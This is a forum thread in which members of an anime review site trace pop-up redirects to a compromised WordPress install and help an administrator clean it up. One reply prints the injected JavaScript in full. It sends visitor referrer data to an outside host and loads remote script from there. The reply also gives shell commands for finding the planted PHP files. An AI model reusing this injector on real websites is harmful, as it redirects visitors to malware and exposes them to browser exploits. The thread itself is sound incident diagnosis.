Please login or register.
Login with username, password and session length

The Nihon Review Forum

December 14, 2017, 07:34:48 PM
News: Check us out on Twitter and Facebook!
Pages: [1] 2  All   Go Down

Author Topic: Virus on the website?  (Read 2605 times)

Offline gotarist

  • Jr. Member
  • **
  • Posts: 22

Virus on the website?
« on: December 26, 2015, 09:07:13 PM »
Whenever I visit the website recently, it automatically re-directs me to some kind of pop-up ad and avast goes crazy.  Would you know anything about this?

Offline Kaikyaku

  • Reviewer
  • Jr. Member
  • *****
  • Posts: 65

Re: Virus on the website?
« Reply #1 on: December 26, 2015, 09:25:11 PM »
Thanks for letting us know. I haven't had this happen, myself. If you see it again, would you be able to take a screencap so we can see what you mean? How are you accessing the site? Through a bookmark or from a search or directly from the URL? Also, once you close the pop-up does the site work normally? Thanks.

Offline TypicalIdiotFan

  • Banned.
  • Reviewer
  • Hero Member
  • *****
  • Posts: 7241
    • @@TypicalIdiotFan

Re: Virus on the website?
« Reply #2 on: December 26, 2015, 11:47:17 PM »
That never happens to me on any platform I use to browse Nihon Review, including mobile devices, work  and home computers, and several browsers including Firefox, Chrome, and IE.

That sounds more like you've got some kind of severe malware on your computer.
I'm just like you, only smarterô.

Offline gotarist

  • Jr. Member
  • **
  • Posts: 22

Re: Virus on the website?
« Reply #3 on: December 30, 2015, 10:49:02 AM »
Seems to have gone away. If it comes back, I'll let you know.  Though, I like the idea of a severe piece of malware on my computer that only targets anime review websites :)

Thanks!

Offline The_Outsider

  • Jr. Member
  • **
  • Posts: 61
  • potatoe

Re: Virus on the website?
« Reply #4 on: December 30, 2015, 06:43:25 PM »
Happens to me on my pc too, and I also have avast.

It's fine on my iPad tho.

Offline MCAL

  • Hero Member
  • *****
  • Posts: 1229

Re: Virus on the website?
« Reply #5 on: December 30, 2015, 07:54:05 PM »
Was happening with me too. Looks like I fixed it.

Offline HuuskerDu

  • Cat-a-tonic
  • Sr. Member
  • ****
  • Posts: 679

Re: Virus on the website?
« Reply #6 on: December 30, 2015, 08:11:10 PM »
WOT reports the site is clean.
HuuskerDu at FanFiction.net.

Offline Delphinox

  • The Only Hero That Ever Dies
  • Sr. Member
  • ****
  • Posts: 500

Re: Virus on the website?
« Reply #7 on: December 30, 2015, 08:33:16 PM »
So I tried fiddling around with how I've been getting to the site: it seems that while it never seems to get me if I just go straight to the site via URL or bookmark, whenever I try to get to an old review or blog article via Google search, there will be a redirect via URL with "xmlheads" in it to a random pop-up site. It's a different site every time, but the xmlheads redirect is the constant between every instance (which is never more than the first few times I access the site via Google search, curiously enough).

I'd have a screenshot, but it's not the end destination that matters so much as the redirect, and I didn't think quickly enough to get a snapshot of the redirect URL. Kind of arbitrary and I don't know jack about site maintenance, but after doing a few quick searches on the matter, I'd guess that it might have something to do with the site's htaccess via WordPress. Annoying as hell for sure, but I just bail on the browser on the spot and haven't had any lasting ill effects from it.

Offline Reckoner

  • Reviewer
  • Sr. Member
  • *****
  • Posts: 955

Re: Virus on the website?
« Reply #8 on: December 30, 2015, 09:50:54 PM »
I reproduced this problem by first searching "Your Lie in April review" in google. Scrolling down to the link to Nihon Review and I get a redirect to some garbage.

Offline HuuskerDu

  • Cat-a-tonic
  • Sr. Member
  • ****
  • Posts: 679

Re: Virus on the website?
« Reply #9 on: December 31, 2015, 01:58:49 AM »
Reckoner, you're right.   The payload is coming from the site's WordPress 4.3.1 engine and gets injected at the bottom of the <head>:

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http : / /www . smithberrybarn . com/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

This is a redirect to http : / / www . smithberrybarn . com/jquery.min.php?xxx (spaces added).  The .jquery.min is obfuscation.  The PHP will lead you back to the real Nihon site if you visit it too many times from the same IP.  I was only able to capture it from a Google link, so I'm guessing it might check for that too. 

The payload at smithberrybarn . com lanches several different attack vectors in rapid succession, including sending a strangely crafted HTTP 2 response packet that I've never seen before.  It looks pretty sophisticated.

The hackers usually back-date the last mod date on their naughty PHP files, but they often forget to also roll back the creation date. Search your WP directories for any PHP files that have a creation timestamp within the past couple weeks:

cd /foo/wordpress  #  Go to your WordPress directory
find . -ctime -14 -type f -name '*.php' -print    # Find all PHP files created in the past 14 days

During your search-and-destroy mission you should temporarily stop Apache, otherwise the hacker's command-and-control site can auto-inject new .php files in your WP faster than you can delete them (think dandelions).

If you can't find the attack vector, look for a non-standard browser sig in the logs.  A common tell is "X11" with no browser name in the browser signature:
grep '\.php.*X11' *.log | grep -E -vi 'Apple|Firefox|Gecko|Opera'  # X11 but no browser name
« Last Edit: December 31, 2015, 02:31:26 AM by HuuskerDu »
HuuskerDu at FanFiction.net.

Offline Kylaran

  • A Priori Impossibility
  • Administrator
  • Full Member
  • *****
  • Posts: 128

Re: Virus on the website?
« Reply #10 on: December 31, 2015, 10:13:44 AM »
Hello everyone,

Sincere apologies for the problem, and thank you very much for bringing it to our attention. In particular, the sleuthing HuuskerDu did was a huge help in finding the problem.

After about a day or two of searching around and checking files I think I've managed to fix the issue. At least, after recruiting a few people to help test I couldn't replicate the issue on my end or that of the others for the main website and blog, but please inform us again if anything else that's suspicious is found, just in case that might not have been the last of this.

Happy new year and looking forward to another wonderful year of anime with all of you!
« Last Edit: December 31, 2015, 10:26:28 AM by Kylaran »

Offline Delphinox

  • The Only Hero That Ever Dies
  • Sr. Member
  • ****
  • Posts: 500

Re: Virus on the website?
« Reply #11 on: January 02, 2016, 11:08:15 AM »
Looks like the problem's still persisting, though this time a different redirect URL pops up (not that I suspect it matters). Imgur for a picture reference if it helps at all, it's the same drill - Google search link causes a redirect, direct access via URL doesn't.

Offline Kylaran

  • A Priori Impossibility
  • Administrator
  • Full Member
  • *****
  • Posts: 128

Re: Virus on the website?
« Reply #12 on: January 02, 2016, 12:05:32 PM »
Looks like the problem's still persisting, though this time a different redirect URL pops up (not that I suspect it matters). Imgur for a picture reference if it helps at all, it's the same drill - Google search link causes a redirect, direct access via URL doesn't.

Thanks for notifying us of this. We'll take another look at it.

Offline HuuskerDu

  • Cat-a-tonic
  • Sr. Member
  • ****
  • Posts: 679

Re: Virus on the website?
« Reply #13 on: January 02, 2016, 12:07:38 PM »
If it's any consolation you are not alone. jQuery.min.php Malware Affects Thousands of Websites.

The actual injector is script-kiddie stuff. It looks like a farm job, where an outfit like RBN (Wiki) will pay the script kiddies $1-$5 per hacked site.  RBN then forwards to malware/spam sites who pay for the 'leads'.

Most of the redirects seem to be the usual spam and malware sites and are generally low threat (unless you click on stuff obviously), but a few like that smithberrybarn site were nasty and could mess up an unpatched browser.
HuuskerDu at FanFiction.net.

Offline gotarist

  • Jr. Member
  • **
  • Posts: 22

Re: Virus on the website?
« Reply #14 on: January 02, 2016, 11:51:02 PM »
If this helps at all, here is Avast's report:

URL: http://www.nihonreview.com/themes/nihon_momen/header.png|{gzip}
Infection: JS:Injection-A [Trj]
Process: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Pages: [1] 2  All   Go Up